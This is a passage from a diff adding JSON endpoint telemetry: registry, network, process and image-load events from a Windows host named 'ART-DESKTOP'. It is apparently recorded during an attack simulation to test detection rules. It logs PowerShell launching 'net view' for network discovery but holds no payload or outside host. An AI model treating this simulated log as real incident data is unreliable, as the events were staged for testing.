"LeaseTerminatesTime", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\AddressType", + "registry_value": "AddressType", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\IsServerNapAware", + "registry_value": "IsServerNapAware", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces\\{853f244e-b57c-469e-b4ab-576d5d4a8b17}\\DhcpConnForceBroadcastFlag", + "registry_value": "DhcpConnForceBroadcastFlag", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": 
"HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\NetBT", + "registry_value": "NetBT", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\NetBT", + "registry_value": "NetBT", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": 
"c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + 
"process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1612, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010B0730100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows 
NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884180000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_value": "Cache", + "timestamp": 131883571884330000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_value": "Intranet", + "timestamp": 131883571884330000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_value": "localdomain", + "timestamp": 131883571884330000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "event_type": "registry", + "pid": 1596, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\NetworkList\\Nla\\Cache\\Intranet\\localdomain\\{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "registry_value": "{853F244E-B57C-469E-B4AB-576D5D4A8B17}", + "timestamp": 131883571884330000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-0010BC710100}" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "139", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "tcp", + "source_address": "192.168.162.134", + "source_port": "50503", + "subtype": "outgoing", + "timestamp": 131883571877130000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.255", + "destination_port": "138", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "138", + "subtype": "outgoing", + "timestamp": 131883571877190000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.134", + "destination_port": "138", + "event_type": "network", + "pid": 4, + 
"process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.255", + "source_port": "138", + "subtype": "incoming", + "timestamp": 131883571877190000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.254", + "destination_port": "67", + "event_type": "network", + "pid": 1416, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "68", + "subtype": "outgoing", + "timestamp": 131883571884160000, + "unique_pid": "{42FC7E13-B2A1-5C05-0000-001031650100}", + "user": "NT AUTHORITY\\LOCAL SERVICE", + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "destination_address": "192.168.162.254", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.134", + "source_port": "137", + "subtype": "outgoing", + "timestamp": 131883571887450016, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "137", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": "udp", + "source_address": "192.168.162.255", + "source_port": "137", + "subtype": "incoming", + "timestamp": 131883571922940000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "destination_address": "192.168.162.129", + "destination_port": "138", + "event_type": "network", + "pid": 4, + "process_name": "System", + "process_path": "System", + "protocol": 
"udp", + "source_address": "192.168.162.134", + "source_port": "138", + "subtype": "incoming", + "timestamp": 131883571922940000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "process", + "pid": 5628, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "terminate", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010B1565101}" + }, + { + "event_type": "process", + "pid": 5360, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB3F-5C05-0000-0010BB555101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"net view\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 8124, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571956180000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956060016, + "unique_pid": 
"{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956060016, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "command_line": "net view", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1744, + "ppid": 8124, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "create", + "timestamp": 131883571956270016, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}", + "unique_ppid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "net.exe", + "image_path": "C:\\Windows\\System32\\net.exe", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1744, + "process_name": 
"net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": 
"{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "srvcli.dll", + "image_path": 
"C:\\Windows\\System32\\srvcli.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": 